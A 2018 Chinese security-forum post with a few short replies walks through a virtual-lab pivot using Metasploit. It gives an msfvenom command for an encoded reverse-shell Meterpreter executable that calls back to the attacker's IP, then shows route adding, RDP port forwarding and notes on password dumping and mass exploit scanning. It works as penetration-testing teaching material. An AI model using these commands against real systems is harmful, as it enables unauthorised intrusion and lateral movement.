用户
搜索
  • TA的每日心情
    郁闷
    2018-4-12 15:57
  • 签到天数: 93 天

    连续签到: 1 天

    [LV.6]常住居民II

    i春秋作家

    wing

    Rank: 7Rank: 7Rank: 7

    30

    主题

    156

    帖子

    1174

    魔法币
    收听
    0
    粉丝
    11
    注册时间
    2016-9-29

    i春秋签约作者

    发表于 2018-1-9 18:23:38 44158
    本帖最后由 幽夜寒香 于 2018-1-10 09:41 编辑

    Metasploit

    使用Metasploit进行路由转发

    0x01 前言

    在进行渗透测试时,端口转发的主要目的是帮助我们能够访问不在于同一网段上的系统上的特定端口,方便我们进行进一步的渗透测试。
    为了更好地理解这一点,我用虚拟机来演示这个步骤,假设我们已经进入了 网络范围为192.168.123.0/24的这一个网段,目标是192.168.206.200

    0x02环境

    Attacker ip: 192.168.123.178 --> parrot
    中转ip: 192.168.123.164 --> windows7
    target ip: 192.168.206.200 --> win2012

    wing
    wing
    wing

    0x03 实验步骤

    这上面三张图已经显示环境的大概信息了,现在的问题就两个:

    • 我怎么去构建实验环境,目标机上面有两个ip或者多个
    • 我怎么通过我的parrot去渗透win2012,因为我们不在同一个网段

    先说第一个:
    我们虚拟机有添加网络适配器的功能,选择桥接模式就好了。
    wing
    wing
    在windows7和windows 2012的虚拟机中都这么添加即可!

    生成payload

    先生成一个payload放在win7上,获得一个session先。

    msfVENOM -p windows/meterpreter/reverse_tcp -e /x86/shikata_ga_nai -i 5 LHOST=192.168.123.178 LPORT=1234 -f exe -o /root/wing.exe

    wing

    在root目录下用建立一个简单的http服务器:

    python -m SimpleHTTPServer

    wing

    wing

    wing

    成功获得session
    wing

    查看目标的ip段:
    wing

    添加一条路由:

    background
    route add 192.168.206.200  255.255.255.0  1
    route print
    #实战中建议直接route add 192.168.206.0  255.255.255.0  1

    wing
    现在就能用msf扫描目标

    wing
    我这里的目标机是win2012,所以不能直接利用漏洞,内网中17-010和08-067还是蛮多的,直接批量扫描即可!
    下面就是常规操作:
    迁移进程:
    wing
    读密码:
    wing

    wing
    得到这个密码后,扫描3389一下,刚刚扫描已经完成了,是开放的,立马做一个的端口转发,利用portfwd
    portfwd 是meterpreter提供的一种基本的端口转发。porfwd可以反弹单个端口到本地,并且监听.使用方法如下:

    meterpreter > portfwd 
    0 total local port forwards.
    meterpreter > portfwd  -h
    Usage: portfwd [-h] [add | delete | list | flush] [args]
    OPTIONS:
        -L <opt>  The local host to listen on (optional).
        -h        Help banner.
        -l <opt>  The local port to listen on.
        -p <opt>  The remote port to connect to.
        -r <opt>  The remote host to connect to.

    其实就是把远程端口映射到本地。
    什么是映射呢?这就要说到我们可爱的高等数学了。就是一一映射。行吧,我抽风了。QWQ
    command:

    portfwd add -l 3389 -r 192.168.206.200 -p 3389

    验证:
    wing
    ok!
    远程桌面连接:

    rdesktop 127.1.1.0:3389

    我的parrot好像不支持这玩意。。。
    说显示器无法打开。kali下应该没问题,自测吧。
    balalalalala!
    下次介绍如何增强你可视化武器-->"cs"

    博客地址:hackerwing.com

    评分

    参与人数 1魔法币 +25 收起 理由
    风在指尖 + 25 感谢你的分享,i春秋论坛有你更精彩!.

    查看全部评分

    evilwing.me——余生,请多指教。
    发表于 2018-1-11 07:22:57
    这个不错,赞
    111111111
    使用道具 举报 回复
    发表于 2018-1-11 10:15:25
    evilwing.me——余生,请多指教。
    使用道具 举报 回复
    学习一下~
    使用道具 举报 回复
    这个方法不错,可以借鉴一下
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册